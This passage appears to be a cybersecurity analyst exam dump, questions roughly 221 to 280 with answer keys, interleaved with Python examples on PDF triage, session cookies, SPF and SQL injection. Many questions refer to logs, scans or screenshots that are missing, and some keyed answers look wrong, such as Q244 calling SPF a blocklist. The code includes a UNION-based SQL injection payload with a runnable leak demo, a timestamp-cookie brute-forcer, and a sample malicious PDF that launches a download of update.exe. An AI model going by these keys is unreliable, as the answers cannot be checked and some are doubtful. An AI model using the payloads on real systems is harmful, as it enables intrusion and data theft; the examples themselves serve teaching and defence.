A security team identified some specific known tactics and techniques to help mitigate repeated credential access threats, such as account manipulation
and brute forcing. Which of the following frameworks or models did the security team MOST likely use to identify the tactics and techniques?

A. MITRE ATT&CK
B. ITIL
C. Kill chain
D. Diamond Model of Intrusion Analysis

Correct Answer: A

QUESTION 222
A security analyst is reviewing the following requirements for new time clocks that will be installed in a shipping warehouse:

· The clocks must be configured so they do not respond to ARP broadcasts.
· The server must be configured with static ARP entries for each clock.

Which of the following types of attacks will this configuration mitigate?

A. Spoofing
B. Overflows
C. Rootkits
D. Sniffing

Correct Answer: A

QUESTION 223
A user receives a potentially malicious attachment that contains spelling errors and a PDF document. A security analyst reviews the email and decides
to download the attachment to a Linux sandbox for review. Which of the following commands would MOST likely indicate if the email is malicious?

A. sha256sum ~/Desktop/file.pdf
B. file ~/Desktop/file.pdf
C. strings ~/Desktop/file.pdf | grep -i "<script"
D. cat < ~/Desktop/file.pdf | grep -i .exe

Correct Answer: C
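The check in option C (dump printable strings, then grep for script markup) generalizes to a quick sandbox triage of a suspicious PDF. The following Python is an added example written for this page, not code from the original question or any vendor: it reimplements the `strings` step and then counts the PDF keywords that usually carry active content (/JavaScript, /JS, /OpenAction, /Launch, /EmbeddedFile) alongside the page's own "<script" and ".exe" indicators. The two PDF byte strings are constructed sample input, not real samples.

```python
import re

# Constructed sample files (assumption: minimal PDF skeletons, not real malware).
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n"
    b"%%EOF\n"
)
MALICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /OpenAction 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /S /JavaScript /JS (app.launchURL('http://203.0.113.9/update.exe')) >>\nendobj\n"
    b"%%EOF\n"
)

# Keywords that indicate auto-run or embedded active content in a PDF, plus the
# two indicators the page's options grep for ("<script" and ".exe").
SUSPICIOUS = (
    b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
    b"/EmbeddedFile", b"<script", b".exe",
)


def strings(data, min_len=4):
    """Python equivalent of the `strings` utility: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage_pdf(data):
    """Return {keyword: hit count} for every suspicious keyword present.

    Matching is case-insensitive, mirroring `grep -i`, and runs over the raw
    bytes so that keywords inside binary streams are still seen.
    """
    hits = {}
    for kw in SUSPICIOUS:
        n = len(re.findall(re.escape(kw), data, flags=re.IGNORECASE))
        if n:
            hits[kw.decode()] = n
    return hits


def looks_malicious(data):
    """Any hit is enough to escalate the file for deeper analysis."""
    return bool(triage_pdf(data))


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PDF), ("suspicious", MALICIOUS_PDF)):
        print(name, triage_pdf(blob))
```

A hit on /OpenAction or /AA combined with /JavaScript is the classic "runs on open" pattern; a clean result only means these markers are absent, since object streams and filters can hide them, so the sandbox detonation remains the authoritative check.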

QUESTION 224
A user reports a malware alert to the help desk. A technician verifies the alert, determines the workstation is classified as a low-severity device, and
uses network controls to block access. The technician then assigns the ticket to a security analyst who will complete the eradication and recovery
processes. Which of the following should the security analyst do NEXT?

A. Document the procedures and walk through the incident training guide
B. Reverse engineer the malware to determine its purpose and risk to the organization
C. Sanitize the workstation and verify countermeasures are restored
D. Isolate the workstation and issue a new computer to the user

Correct Answer: C

QUESTION 225
A security analyst discovers the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can
access it. Which of the following threats applies to this situation?

A. Potential data loss to external users
B. Loss of public/private key management
C. Cloud-based authentication attack
D. Insufficient access logging

Correct Answer: A

QUESTION 226
A security analyst is probing a company's public-facing servers for vulnerabilities and obtains the following output:

Which of the following changes should the analyst recommend FIRST?

A. Implement File Transfer Protocol Secure on the upload server.
B. Disable anonymous login on the web server.
C. Configure firewall changes to close port 445 on 124.45.23.112.
D. Apply a firewall rule to filter the number of requests per second on port 80 on 124.45.23.108.

Correct Answer: C

QUESTION 227
A company that uses email for all internal and external communications received a legal notice from a vendor that was disputing a contract award. The
company needs to implement a legal hold on the email of users who were involved in the vendor selection process and the awarding of the contract.
Which of the following describes the appropriate steps that should be taken to comply with the legal notice?

A. Notify the security team of the legal hold and remove user access to the email accounts.
B. Coordinate with legal counsel and then notify the security team to ensure the appropriate email accounts are frozen.
C. Disable the user accounts that are associated with the legal hold and create new user accounts so they can continue doing business.
D. Encrypt messages that are associated with the legal hold and initiate a chain of custody to ensure admissibility in future legal proceedings.

Correct Answer: B

QUESTION 228
A penetration tester physically enters a datacenter and attaches a small device to a switch. As part of the tester's effort to evaluate which nodes are
present on the network, the tester places the network tap in promiscuous mode and logs traffic for later analysis. Which of the following is the tester
performing?

A. Credential scanning
B. Passive scanning
C. Protocol analysis
D. SCAP scanning
E. Network segmentation

Correct Answer: B

QUESTION 229
While reviewing a cyber-risk assessment, an analyst notes there are concerns related to FPGA usage. Which of the following statements would BEST
convince the analyst's supervisor to use additional controls?

A. FPGAs are expensive and can only be programmed once. Code deployment safeguards are needed.
B. FPGAs have an inflexible architecture; additional training for developers is needed.
C. FPGAs are vulnerable to malware installation and require additional protections for their codebase.
D. FPGAs are expensive to produce. Anti-counterfeiting safeguards are needed.

Correct Answer: C

QUESTION 230
Which of the following BEST explains hardware root of trust?

A. It uses the processor security extensions to protect the OS from malicious software installation.
B. It prevents side-channel attacks that can take advantage of speculative execution vulnerabilities.
C. It ensures the authenticity of firmware and software during the boot process until the OS is loaded.
D. It has been implemented as a mitigation to the Spectre and Meltdown hardware vulnerabilities.

Correct Answer: C

QUESTION 231
A code review reveals a web application is using time-based cookies for session management. This is a security concern because time-based cookies
are easy to:

A. parameterize
B. decode
C. guess
D. decrypt

Correct Answer: C
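Why a time-based session cookie is "easy to guess": if the cookie is derived only from the login timestamp, an attacker who knows roughly when the victim logged in can enumerate the few thousand candidate timestamps around that moment and recover the cookie offline. The Python below is an added example for this page, not the reviewed application's code; the hashing scheme, the victim timestamp and the 5-second search window are assumptions made for illustration, and the contrast is with a cookie from a CSPRNG (`secrets`), which has no such structure.

```python
import hashlib
import math
import secrets


def time_based_session_id(login_time_ms):
    """Insecure scheme (constructed for this example): the cookie is a digest
    of the login time in milliseconds. Hashing adds no secrecy because the
    only input is a low-entropy, attacker-predictable value."""
    return hashlib.sha256(f"sess:{login_time_ms}".encode()).hexdigest()


def guess_time_based_session_id(target_cookie, approx_login_ms, window_ms=5000):
    """Attacker's view: try every millisecond within +/- window_ms of the
    estimated login time and return the timestamp that reproduces the cookie,
    or None if the guess window did not contain it."""
    for t in range(approx_login_ms - window_ms, approx_login_ms + window_ms + 1):
        if time_based_session_id(t) == target_cookie:
            return t
    return None


def guess_space_bits(window_ms=5000):
    """Effective entropy of the time-based cookie given the attacker's
    uncertainty about the login time: log2 of the number of candidates."""
    return math.log2(2 * window_ms + 1)


def random_session_id(nbytes=32):
    """Secure scheme: 256 bits from the OS CSPRNG, URL-safe base64 encoded."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    victim_login_ms = 1_700_000_000_123          # assumed victim login time
    cookie = time_based_session_id(victim_login_ms)
    # Attacker's estimate is off by 1.234 s; still recovered within the window.
    print("recovered:", guess_time_based_session_id(cookie, victim_login_ms + 1234))
    print("time-based cookie entropy (bits):", round(guess_space_bits(), 1))
    print("random cookie:", random_session_id())
```

A 5-second window is about 13 bits of search, trivially brute-forced; a 256-bit random token cannot be enumerated, which is the property the session identifier needs regardless of whether it is also encrypted or encoded.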

QUESTION 232
A company's legal department is concerned that its incident response plan does not cover the countless ways security incidents can occur. They have
asked a security analyst to help tailor the response plan to provide broad coverage for many situations. Which of the following is the BEST way to
achieve this goal?

A. Focus on incidents that have a high chance of reputation harm.
B. Focus on common attack vectors first.
C. Focus on incidents that affect critical systems.
D. Focus on incidents that may require law enforcement support.

Correct Answer: B

QUESTION 233
A security engineer must deploy X.509 certificates to two web servers behind a load balancer. Each web server is configured identically. Which of the
following should be done to ensure certificate name mismatch errors do not occur?

A. Create two certificates, each with the same fully qualified domain name, and associate each with the web servers' real IP addresses on the load
balancer.
B. Create one certificate on the load balancer and associate the site with the web servers' real IP addresses.
C. Create two certificates, each with the same fully qualified domain name, and associate each with a corresponding web server behind the load
balancer.
D. Create one certificate and export it to each web server behind the load balancer.

Correct Answer: C

QUESTION 234
An organization is experiencing issues with emails that are being sent to external recipients. Incoming emails to the organization are working fine. A
security analyst receives the following screenshot of an email error from the help desk:

The analyst then checks the email server and sees many of the following messages in the logs:

Which of the following is MOST likely the issue?

A. SPF is failing.
B. The DMARC queue is full.
C. The DKIM private key has expired.
D. Port 25 is not open.

Correct Answer: A

QUESTION 235
The threat intelligence department recently learned of an advanced persistent threat that is leveraging a new strain of malware, exploiting a system
router. The company currently uses the same device mentioned in the threat report. Which of the following configuration changes would BEST improve
the organization's security posture?

A. Implement an IPS rule that contains content for the malware variant and patch the routers to protect against the vulnerability.
B. Implement an IDS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability.
C. Implement an IPS rule that contains the IP addresses from the advanced persistent threat and patch the routers to protect against the vulnerability.
D. Implement an IDS rule that contains content for the malware variant and patch the routers to protect against the vulnerability

Correct Answer: A

QUESTION 236
A security analyst wants to capture large amounts of network data that will be analyzed at a later time. The packet capture does not need to be in a
format that is readable by humans, since it will be put into a binary file called "packetCapture". The capture must be as efficient as possible, and the
analyst wants to minimize the likelihood that packets will be missed. Which of the following commands will BEST accomplish the analyst's objectives?

A. tcpdump -w packetCapture
B. tcpdump -a packetCapture
C. tcpdump -n packetCapture
D. nmap -v > packetCapture
E. nmap -oA > packetCapture

Correct Answer: A

QUESTION 237
A security analyst needs to assess the web-server versions on a list of hosts to determine which are running a vulnerable version of the software and
then output that list into an XML file named webserverlist.xml. The host list is provided in a file named webserverlist.txt. Which of the following Nmap
commands would BEST accomplish this goal?

A. nmap -iL webserverlist.txt -sC -p 443 -oX webserverlist.xml
B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml
C. nmap -iL webserverlist.txt -F -p 443 -oX webserverlist.xml
D. nmap --takefile webserverlist.txt --outputfileasXML webserverlist.xml --scanports

Correct Answer: B

QUESTION 238
A company creates digitally signed packages for its devices. Which of the following BEST describes the method by which the security packages are
delivered to the company's customers?

A. Anti-tamper mechanism
B. SELinux
C. Trusted firmware updates
D. eFuse

Correct Answer: C

QUESTION 239
A small marketing firm uses many SaaS applications that hold sensitive information. The firm has discovered terminated employees are retaining
access to systems for many weeks after their end date. Which of the following would BEST resolve the issue of lingering access?

A. Perform weekly manual reviews on system access to uncover any issues.
B. Set up a privileged access management tool that can fully manage privileged account access.
C. Implement MFA on cloud-based systems.
D. Configure federated authentication with SSO on cloud provider systems.

Correct Answer: B

QUESTION 240
A security analyst received a SIEM alert regarding high levels of memory consumption for a critical system. After several attempts to remediate the
issue, the system went down. A root cause analysis revealed a bad actor forced the application to not reclaim memory. This caused the system to be
depleted of resources. Which of the following BEST describes this attack?

A. Injection attack
B. Memory corruption
C. Denial of service
D. Array attack

Correct Answer: C

QUESTION 241
A company's change management team has asked a security analyst to review a potential change to the email server before it is released into
production. The analyst reviews the following change request:

Change request date: 2020-01-30
Change requester: Cindy Richardson
Change asset: WIN2K-EMAIL001
Change requested: Modify the following SPF record to change +all to -all

Which of the following is the MOST likely reason for the change?

A. To reject email from servers that are not listed in the SPF record
B. To reject email from email addresses that are not digitally signed
C. To accept email to the company's domain
D. To reject email from users who are not authenticated to the network

Correct Answer: A

QUESTION 242
Which of the following can detect vulnerable third-party libraries before code deployment?

A. Impact analysis
B. Dynamic analysis
C. Static analysis
D. Protocol analysis

Correct Answer: C

QUESTION 243
Which of the following are the MOST likely reasons to include reporting processes when updating an incident response plan after a breach? (Choose
two.)

A. To establish a clear chain of command
B. To meet regulatory requirements for timely reporting
C. To limit reputation damage caused by the breach
D. To remediate vulnerabilities that led to the breach
E. To isolate potential insider threats
F. To provide secure network design changes

Correct Answer: AB

QUESTION 244
A security analyst is reviewing existing email protection mechanisms to generate a report.
The analysis finds the following DNS records:

Record 1 -
v=spf1 ip4:192.168.0.0/16 include:_spf.marketing.com include:thirdpartyprovider.com ~all

Record 2 -
v=DKIM1; k=rsa; p=MIGfMA0GCSqh7d8hyh78Gdg87gd98hag86ga98dhay8gd7ashdca7yg79auhudig7df9ah8g76ag98dhay87ga9

Record 3 -
_dmarc.comptia.com TXT "v=DMARC1; p=reject; pct=100; rua=mailto:dmarc-reports@comptia.com"

Which of the following options provides accurate information to be included in the report?

A. Record 3 serves as a reference of the security features configured at Record 1 and 2.
B. Record 1 is used as a blocklist mechanism to filter unauthorized senders.
C. Record 2 is used as a key to encrypt all outbound messages sent.
D. The three records contain private information that should not be disclosed.

Correct Answer: B
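QUESTION 205, QUESTION 241 and QUESTION 244 all turn on how a receiving mail server walks an SPF record: mechanisms are tried left to right, the first match wins, and the trailing `all` term decides what happens to everyone else. The Python below is an added example written for this page, not the questions' own records or any vendor's code; it evaluates a small in-memory zone instead of live DNS, so the domain names and IP ranges in the `DNS` table are assumptions (example.com stands in for the organization of QUESTION 205 with its 180.10.6.6 / 180.10.6.5 servers and robustmail.com partner). It models the three outcomes the questions describe: a misspelled `include:` domain (permanent error, mail rejected), `+all` versus `-all` (QUESTION 241), and the `~all` softfail of Record 1 in QUESTION 244.

```python
import ipaddress

# Constructed stand-in for DNS TXT lookups so the example runs offline.
# All records below are assumptions made for this example, not page data.
DNS = {
    "example.com":
        "v=spf1 ip4:180.10.6.6 ip4:180.10.6.5 include:robustmail.com -all",
    "robustmail.com":
        "v=spf1 ip4:203.0.113.0/24 -all",
    # Misspelled include domain (robustmail.net): the failure mode of QUESTION 205.
    "example-wrong-include.com":
        "v=spf1 ip4:180.10.6.6 ip4:180.10.6.5 include:robustmail.net -all",
    # "+all": the setting QUESTION 241 changes to "-all".
    "example-permissive.com":
        "v=spf1 ip4:180.10.6.6 ip4:180.10.6.5 +all",
    # "~all": softfail, as in Record 1 of QUESTION 244.
    "example-soft.com":
        "v=spf1 ip4:180.10.6.0/24 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_INCLUDE_DEPTH = 10   # RFC 7208 caps DNS-querying terms at 10


def check_spf(domain, sender_ip, depth=0):
    """Evaluate `domain`'s SPF record for a message received from `sender_ip`.

    Returns one of: pass, fail, softfail, neutral, none, permerror.
    Only ip4/ip6/include/all are implemented; a, mx, ptr and exists need
    live DNS and are ignored in this offline model.
    """
    if depth > MAX_INCLUDE_DEPTH:
        return "permerror"
    record = DNS.get(domain)
    if record is None:
        return "none"
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"                        # default qualifier is "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            return QUALIFIERS[qualifier]       # "+all" passes anyone, "-all" rejects
        if mech in ("ip4", "ip6"):
            if ip in ipaddress.ip_network(arg, strict=False):
                return QUALIFIERS[qualifier]
        elif mech == "include":
            inner = check_spf(arg, sender_ip, depth + 1)
            if inner == "pass":
                return QUALIFIERS[qualifier]
            if inner in ("none", "permerror"):
                return "permerror"             # unresolvable include: permanent error
        # modifiers such as redirect= and exp= are ignored here
    return "neutral"                           # nothing matched and no "all" term


if __name__ == "__main__":
    for dom, ip in (("example.com", "203.0.113.7"),
                    ("example-wrong-include.com", "203.0.113.7"),
                    ("example-permissive.com", "198.51.100.1"),
                    ("example-soft.com", "198.51.100.1")):
        print(f"{dom:28} {ip:14} -> {check_spf(dom, ip)}")
```

Two practical observations follow from running it: a wrong `include:` domain does not merely skip the partner, it turns the whole evaluation into a permerror, which most receivers treat as a reject; and a record ending in `+all` passes every sender on the internet, which is why the change in QUESTION 241 is a tightening rather than a cosmetic edit.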

QUESTION 245
An organization has a policy that requires servers to be dedicated to one function and unneeded services to be disabled. Given the following output from
an Nmap scan of a web server:

Which of the following ports should be closed?

A. 22
B. 80
C. 443
D. 1433

Correct Answer: D

QUESTION 246
A security analyst is reviewing WAF alerts and sees the following request:

Request="GET /public/report.html?iewt=9064 AND 1=1 UNION ALL SELECT 1,NULL,table_name FROM information_schema.tables WHERE 2>1--/**/;
HTTP/1.1 Host=mysite.com

Which of the following BEST describes the attack?

A. SQL injection
B. LDAP injection
C. Command injection
D. Denial of service

Correct Answer: A
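The request in QUESTION 246 is a UNION-based injection against a query built with dynamic SQL, and QUESTION 218 gives the fix: parameterized queries. The Python below is an added example for this page, not the application's code or any vendor's. It uses an in-memory SQLite database with constructed tables; because SQLite has no `information_schema.tables`, the page's payload is adapted to read the equivalent catalogue, `sqlite_master`. The vulnerable function keeps the concatenation pattern so the leak is visible; the hardened one binds the value as a parameter and validates its type.

```python
import sqlite3

# The page's payload, with information_schema.tables (MySQL) swapped for the
# SQLite catalogue so it runs here. Three selected columns match the three
# columns of the legitimate query, which is what makes the UNION succeed.
PAYLOAD = "9064 AND 1=1 UNION ALL SELECT 1,NULL,name FROM sqlite_master WHERE 2>1--/**/"


def make_db():
    """Constructed sample schema (an assumption for this example)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE reports (id INTEGER, title TEXT, body TEXT)")
    con.executemany("INSERT INTO reports VALUES (?, ?, ?)",
                    [(9064, "Q1 summary", "public"), (9065, "Q2 summary", "public")])
    # A table the attacker should never learn about, let alone read.
    con.execute("CREATE TABLE customer_cards (id INTEGER, pan TEXT, cvv TEXT)")
    return con


def fetch_report_dynamic(con, view):
    """Legacy pattern: the request parameter is spliced into the SQL text.
    Deliberately vulnerable to show the UNION leak."""
    sql = "SELECT id, title, body FROM reports WHERE id = " + view
    return con.execute(sql).fetchall()


def fetch_report_parameterized(con, view):
    """Refactored pattern: the value travels as a bound parameter, never as
    SQL text, and is validated as a numeric id before it reaches the driver."""
    if not view.isdigit():
        raise ValueError("report id must be a positive integer")
    return con.execute(
        "SELECT id, title, body FROM reports WHERE id = ?", (int(view),)
    ).fetchall()


def leaked_table_names(con, view):
    """Table names pulled out of the catalogue by an injected UNION.
    Injected rows carry NULL in the title column; legitimate rows do not."""
    return sorted(r[2] for r in fetch_report_dynamic(con, view) if r[1] is None)


def parameterized_rejects(con, view):
    """True when the hardened query refuses the input outright."""
    try:
        fetch_report_parameterized(con, view)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    print("dynamic SQL with payload:", fetch_report_dynamic(con, PAYLOAD))
    print("leaked tables:", leaked_table_names(con, PAYLOAD))
    print("parameterized rejects payload:", parameterized_rejects(con, PAYLOAD))
```

Parameterization alone already neutralizes the payload (a bound string never becomes SQL); the `isdigit()` check on top is the input validation of option A in QUESTION 218, useful as defence in depth but not a substitute for the bound parameter.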

QUESTION 247
Clients are unable to access a company's API to obtain pricing data. An analyst discovers sources other than clients are scraping the API for data, which
is causing the servers to exceed available resources. Which of the following would be BEST to protect the availability of the APIs?

A. IP whitelisting
B. Certificate-based authentication
C. Virtual private network
D. Web application firewall

Correct Answer: D

QUESTION 248
A security analyst needs to determine the best method for securing access to a top-secret datacenter. Along with an access card and PIN code, which of
the following additional authentication methods would be BEST to enhance the datacenter's security?

A. Physical key
B. Retinal scan
C. Passphrase
D. Fingerprint

Correct Answer: B

QUESTION 249
A user's computer has been running slowly when the user tries to access web pages. A security analyst runs the command netstat -aon from the
command line and receives the following output:

Which of the following lines indicates the computer may be compromised?

A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6

Correct Answer: C

QUESTION 250
Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the
value of:

A. vulnerability scanning.
B. threat hunting.
C. red teaming.
D. penetration testing.

Correct Answer: B

QUESTION 251
An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data,
including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor

Correct Answer: D

QUESTION 252
A remote code execution vulnerability was discovered in RDP. An organization currently uses RDP for remote access to a portion of its VDI
environment. The analyst verified network-level authentication is enabled. Which of the following is the BEST remediation for this vulnerability?

A. Verify the threat intelligence feed is updated with the latest solutions.
B. Verify the system logs do not contain indicators of compromise.
C. Verify the latest endpoint-protection signature is in place.
D. Verify the corresponding patch for the vulnerability is installed.

Correct Answer: D

QUESTION 253
An information security analyst observes anomalous behavior on the SCADA devices in a power plant. This behavior results in the industrial generators
overheating and destabilizing the power supply. Which of the following would BEST identify potential indicators of compromise?

A. Use Burp Suite to capture packets to the SCADA device's IP.
B. Use tcpdump to capture packets from the SCADA device IP.
C. Use Wireshark to capture packets between SCADA devices and the management system.
D. Use Nmap to capture packets from the management system to the SCADA devices.

Correct Answer: C

QUESTION 254
An organization wants to implement a privileged access management solution to better manage the use of emergency and privileged service accounts.
Which of the following would BEST satisfy the organization's goal?

A. Access control lists
B. Discretionary access controls
C. Policy-based access controls
D. Credential vaulting

Correct Answer: C

QUESTION 255
During a cyber incident, which of the following is the BEST course of action?

A. Switch to using a preapproved, secure, third-party communication system.
B. Keep the entire company informed to ensure transparency and integrity during the incident.
C. Restrict customer communication until the severity of the breach is confirmed.
D. Limit communications to preauthorized parties to ensure response efforts remain confidential.

Correct Answer: D

QUESTION 256
Legacy medical equipment, which contains sensitive data, cannot be patched. Which of the following is the BEST solution to improve the equipment's
security posture?

A. Move the legacy systems behind a WAF
B. Implement an air gap for the legacy systems
C. Place the legacy systems in the perimeter network
D. Implement a VPN between the legacy systems and the local network

Correct Answer: B

QUESTION 257
Which of the following BEST explains the function of a managerial control?

A. To scope the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To implement data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails

Correct Answer: C

QUESTION 258
Which of the following provides an automated approach to checking a system configuration?

A. SCAP
B. CI/CD
C. OVAL
D. Scripting
E. SOAR

Correct Answer: A

QUESTION 259
A digital forensics investigator works from duplicate images to preserve the integrity of the original evidence. Which of the following types of media are
MOST volatile and should be preserved? (Choose two.)

A. Memory cache
B. Registry file
C. SSD storage
D. Temporary filesystems
E. Packet decoding
F. Swap volume

Correct Answer: AD

QUESTION 260
A development team signed a contract that requires access to an on-premises physical server. Access must be restricted to authorized users only, and
the server cannot be connected to the internet. Which of the following solutions would meet this requirement?

A. Establish a hosted SSO
B. Implement a CASB
C. Virtualize the server
D. Air gap the server

Correct Answer: D

QUESTION 261
After a breach involving the exfiltration of a large amount of sensitive data, a security analyst is reviewing the following firewall logs to determine how the
breach occurred.

Which of the following IP addresses does the analyst need to investigate further?

A. 192.168.1.1
B. 192.168.1.10
C. 192.168.1.12
D. 192.168.1.193

Correct Answer: C

QUESTION 262
A security engineer is reviewing security products that identify malicious actions by users as part of a company's insider threat program. Which of the
following is the MOST appropriate product category for this purpose?

A. SCAP
B. SOAR
C. UEBA
D. WAF

Correct Answer: C

QUESTION 263
A security analyst discovers the company's website is vulnerable to cross-site scripting. Which of the following solutions will BEST remedy the
vulnerability?

A. Prepared statements
B. Server-side input validation
C. Client-side input encoding
D. Disabled JavaScript filtering

Correct Answer: B

QUESTION 264
During an audit, several customer order forms were found to contain inconsistencies between the actual price of an item and the amount charged to the
customer. Further investigation narrowed the cause of the issue to manipulation of the public-facing web form used by customers to order products.
Which of the following would be the BEST way to locate this issue?

A. Reduce the session timeout threshold.
B. Deploy MFA for access to the web server.
C. Implement input validation.
D. Run a static code scan.

Correct Answer: D

QUESTION 265
During a company's most recent incident, a vulnerability in custom software was exploited on an externally facing server by an APT. The lessons-
learned report noted the following:

· The development team used a new software language that was not supported by the security team's automated assessment tools.
· During the deployment, the security assessment team was unfamiliar with the new language and struggled to evaluate the software during advanced
testing. Therefore, the vulnerability was not detected.
· The current IPS did not have effective signatures and policies in place to detect and prevent runtime attacks on the new application.

To allow this new technology to be deployed securely going forward, which of the following will BEST address these findings? (Choose two.)

A. Train the security assessment team to evaluate the new language and verify that best practices for secure coding have been followed
B. Work with the automated assessment-tool vendor to add support for the new language so these vulnerabilities are discovered automatically
C. Contact the human resources department to hire new security team members who are already familiar with the new language
D. Run the software on isolated systems so when they are compromised, the attacker cannot pivot to adjacent systems
E. Instruct only the development team to document the remediation steps for this vulnerability
F. Outsource development and hosting of the applications in the new language to a third-party vendor so the risk is transferred to that provider

Correct Answer: AB

QUESTION 266
Employees of a large financial company are continuously being infected by strands of malware that are not detected by EDR tools. Which of the
following is the BEST security control to implement to reduce corporate risk while allowing employees to exchange files at client sites?

A. MFA on the workstations
B. Additional host firewall rules
C. VDI environment
D. Hard drive encryption
E. Network access control
F. Network segmentation

Correct Answer: C

QUESTION 267
During an investigation, a security analyst determines suspicious activity occurred during the night shift over the weekend. Further investigation reveals
the activity was initiated from an internal IP going to an external website. Which of the following would be the MOST appropriate recommendation to
prevent similar activity from happening in the future?

A. An IPS signature modification for the specific IP addresses
B. An IDS signature modification for the specific IP addresses
C. A firewall rule that will block port 80 traffic
D. Implement a WAF to restrict malicious web content

Correct Answer: D

QUESTION 268
During a routine review of service restarts, a security analyst observes the following in a server log:

Which of the following is the GREATEST security concern?

A. The daemon's binary was changed.
B. Four consecutive days of monitoring are skipped in the log.
C. The process identifiers for the running service change.
D. The PIDs are continuously changing.

Correct Answer: A

QUESTION 269
Law enforcement officials have notified an organization that one of its internal servers is suspected of being a command-and-control server for a
malicious botnet. The organization's security analyst has been tasked with analyzing the internal server for indications of compromise. During the
investigation, the analyst reviews the processes running on the server and sees the following:

Which of the following processes warrants further investigation?

A. cmd.exe
B. iexplore
C. nc.exe
D. notepad.exe

Correct Answer: C

QUESTION 270
A company recently experienced multiple DNS DDoS attacks, and the information security analyst must provide a DDoS solution to deploy in the
company's data center. Which of the following would BEST prevent future attacks?

A. Route the queries on the DNS server to 127.0.0.1.
B. Buy a UTM to block the number of requests.
C. Call the internet service provider to block the attack.
D. Configure a sinkhole on the router.

Correct Answer: D

QUESTION 271
An organization was alerted to a possible compromise after its proprietary data was found for sale on the internet. An analyst is reviewing the logs from
the next-generation UTM in an attempt to find evidence of this breach. Given the following output:

Which of the following should be the focus of the investigation?

A. webserver.org-dmz.org
B. sftp.org-dmz.org
C. 83hht23.org-int.org
D. ftps.bluemed.net

Correct Answer: A

QUESTION 272
While planning segmentation for an ICS environment, a security engineer determines IT resources will need access to devices within the ICS
environment without compromising security. To provide the MOST secure access model in this scenario, the jumpbox should be:

A. placed in an isolated network segment, authenticated on the IT side, and forwarded into the ICS network.
B. placed on the ICS network with a static firewall rule that allows IT network resources to authenticate.
C. bridged between the IT and operational technology networks to allow authenticated access.
D. placed on the IT side of the network, authenticated, and tunneled into the ICS environment.

Correct Answer: D

QUESTION 273
Which of the following should a database administrator implement to BEST protect data from an untrusted server administrator?

A. Data deidentification
B. Data encryption
C. Data masking
D. Data minimization

Correct Answer: B

QUESTION 274
A developer is working on a program to convert user-generated input in a web form before it is displayed by the browser. The technique is referred to as:

A. Output encoding.
B. Data protection.
C. Query parameterization.
D. Input validation.

Correct Answer: A

QUESTION 275
A security team is struggling with alert fatigue, and the Chief Information Security Officer has decided to purchase a SOAR platform to alleviate this
issue. Which of the following BEST describes how a SOAR platform will help the security team?

A. SOAR will integrate threat intelligence into the alerts, which will help the security team decide which events should be investigated first.
B. A SOAR platform connects the SOC with the asset database, enabling the security team to make informed decisions immediately based on asset
criticality.
C. The security team will be able to use the SOAR framework to integrate the SIEM with a TAXII server, which has an automated intelligence feed that
will enhance the alert data.
D. Logic can now be created that will allow the SOAR platform to block specific traffic at the firewall according to predefined event triggers and actions.

Correct Answer: A

QUESTION 276
An analyst needs to forensically examine a Windows machine that was compromised by a threat actor. Intelligence reports state this specific threat actor
is characterized by hiding malicious artifacts, especially with alternate data streams. Based on this intelligence, which of the following BEST explains
alternate data streams?

A. A different way data can be streamlined if the user wants to use less memory on a Windows system for forking resources.
B. A way to store data on an external drive attached to a Windows machine that is not readily accessible to users.
C. A Windows attribute that provides for forking resources and is potentially used to hide the presence of secret or malicious files inside the file records
of a benign file.
D. A Windows attribute that can be used by attackers to hide malicious files within system memory.

Correct Answer: C

QUESTION 277
A security analyst is reviewing the network security monitoring logs listed below:

A. 10.1.1.128 sent potential malicious traffic to the web server
B. 10.1.1.128 sent malicious requests, and the alert is a false positive
C. 10.1.1.129 successfully exploited a vulnerability on the web server
D. 10.1.1.129 sent potential malicious requests to the web server
E. 10.1.1.129 sent non-malicious requests, and the alert is a false positive
F. 10.1.1.130 can potentially obtain information about the PHP version

Correct Answer: D

QUESTION 278
An analyst is reviewing the following output:

Vulnerability found: Improper neutralization of script-related HTML tag.

Which of the following was MOST likely used to discover this?

A. Reverse engineering using a debugger
B. A static analysis vulnerability scan
C. A passive vulnerability scan
D. A web application vulnerability scan

Correct Answer: D

QUESTION 279
An organization has been seeing increased levels of malicious traffic. A security analyst wants to take a more proactive approach to identify the threats
that are acting against the organization's network. Which of the following approaches should the security analyst recommend?

A. Use the MITRE ATT&CK framework to develop threat models.
B. Conduct internal threat research and establish indicators of compromise.
C. Review the perimeter firewall rules to ensure the accuracy of the rule set.
D. Use SCAP scans to monitor for configuration changes on the network.

Correct Answer: B

QUESTION 280
